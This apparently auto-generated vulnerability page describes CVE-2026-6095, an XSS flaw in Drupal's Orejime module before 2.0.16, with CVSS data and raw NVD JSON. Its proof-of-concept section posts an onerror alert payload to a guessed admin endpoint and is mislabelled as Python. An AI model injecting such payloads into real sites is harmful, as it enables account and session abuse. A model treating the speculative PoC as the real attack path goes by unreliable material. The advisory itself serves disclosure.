Security Vulnerability Report
中文
CVE-2026-6095 CVSS 6.1 MEDIUM

CVE-2026-6095

Published: 2026-05-19 23:16:58
Last Modified: 2026-05-20 14:17:03

Description

Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Orejime allows Cross-Site Scripting (XSS). This issue affects Orejime: from 0.0.0 before 2.0.16.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Orejime < 2.0.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-6095 --> <!-- Inject script into a vulnerable parameter in Orejime --> <script> // Example payload to test XSS vulnerability var payload = '<img src=x onerror=alert("CVE-2026-6095")>'; // Simulate injection via a vulnerable endpoint (e.g., cookie preferences) fetch('/admin/config/system/orejime', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'consent_message=' + encodeURIComponent(payload) }).then(response => console.log('Payload sent')); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6095", "sourceIdentifier": "[email protected]", "published": "2026-05-19T23:16:57.970", "lastModified": "2026-05-20T14:17:03.207", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (\"Cross-site Scripting\") vulnerability in Drupal Orejime allows Cross-Site Scripting (XSS).\n\nThis issue affects Orejime: from 0.0.0 before 2.0.16."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2026-032", "source": "[email protected]"}]}}